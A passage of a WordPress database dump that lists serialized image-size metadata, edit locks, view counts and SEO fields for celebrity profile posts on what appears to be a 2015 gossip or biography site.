:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Barack-Obama-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Barack-Obama-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Barack-Obama-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1395,207,'_wp_attachment_image_alt','Barack Obama'),(1396,199,'_thumbnail_id','207'),(1398,208,'_wp_attached_file','2015/08/Jessica-Nigri.jpg'),(1399,208,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:533;s:4:\"file\";s:25:\"2015/08/Jessica-Nigri.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Jessica-Nigri-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Jessica-Nigri-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Jessica-Nigri-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1400,208,'_wp_attachment_image_alt','Jessica Nigri'),(1401,202,'_thumbnail_id','208'),(1403,209,'_wp_attached_file','2015/08/Marisa-Miller-.jpg'),(1404,209,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:26:\"2015/08/Marisa-Miller-.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:24:\"Marisa-Miller--80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:25:\"Marisa-Miller--100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:26:\"Marisa-Miller--630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1405,209,'_wp_attachment_image_alt','Marisa Miller '),(1406,203,'_thumbnail_id','209'),(1408,210,'_wp_attached_file','2015/08/Charlize-Theron.jpg'),(1409,210,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:534;s:4:\"file\";s:27:\"2015/08/Charlize-Theron.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"Charlize-Theron-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"Charlize-Theron-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-696x465.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:465;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"Charlize-Theron-629x420.jpg\";s:5:\"width\";i:629;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1410,210,'_wp_attachment_image_alt','Charlize Theron'),(1411,200,'_thumbnail_id','210'),(1413,211,'_edit_lock','1444855190:6'),(1414,212,'_edit_lock','1441463388:2'),(1415,213,'_edit_lock','1497974860:2'),(1416,214,'_edit_lock','1440097838:3'),(1417,211,'_edit_last','6'),(1418,215,'_edit_lock','1497974857:2'),(1419,212,'_edit_last','3'),(1420,213,'_edit_last','2'),(1421,214,'_edit_last','3'),(1422,215,'_edit_last','2'),(1423,211,'post_views_count','231'),(1424,215,'post_views_count','222'),(1425,214,'post_views_count','263'),(1426,213,'post_views_count','281'),(1427,212,'post_views_count','178'),(1428,216,'_wp_attached_file','2015/08/Sean-Penn.jpg'),(1429,216,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:21:\"2015/08/Sean-Penn.jpg\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:19:\"Sean-Penn-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:20:\"Sean-Penn-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-534x400.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:21:\"Sean-Penn-600x385.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1430,216,'_wp_attachment_image_alt','Sean Penn'),(1431,211,'_thumbnail_id','216'),(1432,211,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1433,211,'slide_template',''),(1434,211,'_yoast_wpseo_focuskw','Sean Penn'),(1435,211,'_yoast_wpseo_title','Sean Penn'),(1436,211,'_yoast_wpseo_metadesc','Sean Penn is an actor and director based out of California. Learn more about his personal life, his career, and what he is most known for here.'),(1437,211,'_yoast_wpseo_linkdex','81'),(1438,212,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1439,212,'slide_template','default'),(1440,213,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1441,213,'slide_template','default'),(1442,215,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1443,215,'slide_template','default'),(1444,214,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(1445,214,'slide_template','default'),(1446,217,'_edit_lock','1444848269:6'),(1447,218,'_edit_lock','1444831972:6'),(1448,219,'_edit_lock','1444832001:6'),(1449,220,'_edit_lock','1444832043:6'),(1450,221,'_edit_lock','1444855174:6'),(1451,217,'_edit_last','6'),(1452,218,'_edit_last','6'),(1453,219,'_edit_last','6'),(1454,220,'_edit_last','6'),(1455,221,'_edit_last','6'),(1456,222,'_wp_attached_file','2015/08/Edward-Norton.jpg'),(1457,222,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:427;s:4:\"file\";s:25:\"2015/08/Edward-Norton.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Edward-Norton-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Edward-Norton-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-534x427.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Edward-Norton-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1458,223,'_wp_attached_file','2015/08/Amy-Adams.jpg'),(1459,223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:533;s:4:\"file\";s:21:\"2015/08/Amy-Adams.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:19:\"Amy-Adams-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:20:\"Amy-Adams-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:21:\"Amy-Adams-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\